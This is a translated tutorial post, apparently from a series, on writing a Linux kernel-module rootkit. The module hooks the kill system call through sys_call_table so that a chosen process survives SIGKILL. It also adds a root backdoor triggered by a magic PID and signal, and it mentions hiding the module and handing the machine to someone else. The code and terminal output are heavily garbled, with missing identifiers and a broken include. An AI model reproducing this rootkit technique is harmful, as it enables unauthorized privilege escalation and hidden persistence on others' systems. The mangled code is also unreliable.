In the previous section we wrote a basic LKM. In terms of functionality it has no rootkit features yet, so this time we add some interesting ones to it: let's make a chosen process refuse to die.
Suppose you want to write a process that nobody can kill. The process can catch SIGTERM, the default signal sent by kill, and it can catch SIGINT, which you normally send by pressing Ctrl-C. There is one signal, however, that it cannot stop in any way:
SIGKILL, the ultimate killer.
But we are cockroaches; how can we let reality crush us like that? We have to say no to fate, so there are several solutions. One: two processes watch each other, and when one dies the other immediately starts a replacement. Another solution is the following.
Who is it that lets kill -9 kill the program? Who is it? It is the operating system. Since everything is a system call, kill is a system call too... so we can modify the system call and, in kernel mode, simply ignore the signal.
Switching the uid while we are in there is trivial, too.
Enough talk; on to the code.
#include <asm/unistd.h>
#include <linux/highmem.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/list.h>
#include <linux/dirent.h>
#include <linux/.h>
#include <linux/fdtable.h>
#include <linux/moduleparam.h>

#define ROOT_PID 7311
#define ROOT_SIG 7

lpid = , *sys_call_table = (unsigned *) unsigned cr0 =& (*kill_ptr)(pid_t pid, hacked_kill(pid_t pid, (pid == ROOT_PID && sig == cred *= ( cred *->uid = ->gid = ->suid = ->euid = ->euid = ->egid = ->fsuid = ->fsgid = (pid == = (* rootkit_in( module *== (kill_ptr)sys_call_table[__NR_kill]; sys_call_table[__NR_kill] = (unsigned &((self = find_module(&self->& rootkit_out(== (unsigned
Note that the address 0xc12efee0 differs from machine to machine. It is recorded in /boot/System.map-`uname -r`, which lists the address of sys_call_table:
cat /boot/System.map-`uname -r` | grep sys_call
unsigned *sys_call_table = (unsigned *) 0xc12efee0;
The basic usage is:
1. Start any process. Here we use the daemon background sign-in program as an example, ./L133; the recorded pid is 13165.
liet@kali:~/code/c/study/socket/http/bbs_sign$ ./~/code/c/study/socket/http/bbs_sign$ aux | ? S : : ./ pts/ S+ : : ~/code/c/study/socket/http/bbs_sign$
2. Load the rootkit
liet@kali:~/code/c/study/virus/toykit/toykit_or/test$ test.ko lpid=~/code/c/study/virus/toykit/toykit_or/test$ dmesg | ] warning: `VirtualBox[ ] test: `~/code/c/study/virus/toykit/toykit_or/test$
OK, rootkit loaded!
3. Rootkit operation
1. Process 13165 cannot be killed
liet@kali:~/code/c/study/socket/http/bbs_sign$ - ~/code/c/study/socket/http/bbs_sign$ aux | ? S : : ./ pts/ S+ : : l137
2. Root backdoor
liet@kali:~/code/c/study/socket/http/bbs_sign$ =(liet) gid=(liet) =(liet),(dialout),(~/code/c/study/socket/http/bbs_sign$ - ~/code/c/study/socket/http/bbs_sign$ =(root) gid=(root) =(root),(dialout),(),~/code/c/study/socket/http/bbs_sign$
Once you have done this, you can hide the module and hand the machine over to someone else; let them try to kill the process and see how they manage it...